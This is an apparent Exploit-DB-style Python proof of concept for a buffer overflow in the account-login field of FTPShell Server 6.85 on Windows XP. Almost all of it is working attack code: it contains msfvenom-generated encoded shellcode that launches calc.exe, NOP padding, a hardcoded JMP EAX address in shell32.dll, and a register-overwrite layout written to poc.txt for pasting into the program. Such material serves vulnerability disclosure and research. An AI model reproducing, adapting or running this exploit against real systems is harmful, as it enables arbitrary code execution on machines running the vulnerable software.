#!/usr/bin/python # Exploit Title: FTPShell Server 6.85 - Add Account Buffer Overflow # Date: December 2nd, 2019 # Exploit Author: boku # Vendor Homepage: http://www.ftpshell.com/index.htm # SOftware Link: http://www.ftpshell.com/downloadserver.htm # Program Name: FTPShell Server (Secure Plus edition) # Version: Version 6.85 # Tested on: Windows XP Professional (32-bit)- 5.1.2600 Service Pack 3 Build 2600 # Recreate: # - Install FTPShell Server v6.85 # - open 'FTPShell Server Administrator' # - Click button 'Manage FTP Accounts..' # - Click button 'Configure accounts..' # - Click button 'Add' # - Run python script & transfer 'poc.txt' to windows box # - Open 'poc.txt' & select-all, then copy # - Paste poc.txt text blob into 'Login' text-box # - Press button 'OK'; program will crash & shellcode will execute blt = '\033[92m[\033[0m+\033[92m]\033[0m ' # green success bullet err = '\033[91m[\033[0m!\033[91m]\033[0m ' # red fail bullet try: f = open('poc.txt', 'w') # open file for write # Instructions @ Crash: # 1. mov ecx,[esi+7c0]; # 2. mov eax,[ecx]; lea edx, [ebp-4]; push edx; # 3. call [eax+2c4]; # exploit leaves 708 bytes for shellcode. #msfvenom -p windows/exec CMD='calc.exe' -a x86 --platform windows -b '\x00' -v shellcode -f python #x86/shikata_ga_nai chosen with final size 220 shellcode = b"" shellcode += b"\xbb\x4f\x79\xd7\xce\xda\xde\xd9\x74\x24\xf4" shellcode += b"\x5a\x2b\xc9\xb1\x31\x31\x5a\x13\x83\xea\xfc" shellcode += b"\x03\x5a\x40\x9b\x22\x32\xb6\xd9\xcd\xcb\x46" shellcode += b"\xbe\x44\x2e\x77\xfe\x33\x3a\x27\xce\x30\x6e" shellcode += b"\xcb\xa5\x15\x9b\x58\xcb\xb1\xac\xe9\x66\xe4" shellcode += b"\x83\xea\xdb\xd4\x82\x68\x26\x09\x65\x51\xe9" shellcode += b"\x5c\x64\x96\x14\xac\x34\x4f\x52\x03\xa9\xe4" shellcode += b"\x2e\x98\x42\xb6\xbf\x98\xb7\x0e\xc1\x89\x69" shellcode += b"\x05\x98\x09\x8b\xca\x90\x03\x93\x0f\x9c\xda" shellcode += b"\x28\xfb\x6a\xdd\xf8\x32\x92\x72\xc5\xfb\x61" shellcode += b"\x8a\x01\x3b\x9a\xf9\x7b\x38\x27\xfa\xbf\x43" shellcode += b"\xf3\x8f\x5b\xe3\x70\x37\x80\x12\x54\xae\x43" shellcode += b"\x18\x11\xa4\x0c\x3c\xa4\x69\x27\x38\x2d\x8c" shellcode += b"\xe8\xc9\x75\xab\x2c\x92\x2e\xd2\x75\x7e\x80" shellcode += b"\xeb\x66\x21\x7d\x4e\xec\xcf\x6a\xe3\xaf\x85" shellcode += b"\x6d\x71\xca\xeb\x6e\x89\xd5\x5b\x07\xb8\x5e" shellcode += b"\x34\x50\x45\xb5\x71\xae\x0f\x94\xd3\x27\xd6" shellcode += b"\x4c\x66\x2a\xe9\xba\xa4\x53\x6a\x4f\x54\xa0" shellcode += b"\x72\x3a\x51\xec\x34\xd6\x2b\x7d\xd1\xd8\x98" shellcode += b"\x7e\xf0\xba\x7f\xed\x98\x12\x1a\x95\x3b\x6b" # 3. call [eax+2c4]; # - Hexadecimal 0x2c4 = 708 decimal junk1 = '\x90' * (708-len(shellcode)) # - The call [eax+2c4] instruction will pass execution to the address located at EAX+708 # - Setting [EAX+708] to an existing JMP EAX instruction will pass execution to our shellcode # - 0x7c9ef4c9 jmp eax | (Execute&Read) shell32.dll; aslr&rebase: false jmpEax = '\xc9\xf4\x9e\x7c' # 1. mov ecx,[esi+7c0]; # - ESI = 0x0012C108 # - esi+7c0 is in our supplied buffer, on the stack, at the time of the crash. # - Control ECX @ offset 1568 bytes junk2 = '\x90' * (1568-len(shellcode+junk1+jmpEax)) # 2. mov eax,[ecx]; # - ECX = 0x0012B768 = PTR (located on Stack) to the beginning of our shellcode in the Heap # - EIP 3-Byte Overwrite - '\x68\xb7\x12' ecx = '\x68\xb7\x12' # - EIP 3-Byte Overwrite - '\x68\xb7\x12 # - The '\x00' is supplied by the program when pressing the 'OK' button # - eax is now set to the address of our shellcode. f.write(shellcode+junk1+jmpEax+junk2+ecx) f.close() # close the file print blt + 'poc.txt created successfully' except: print err + 'poc.txt failed to create'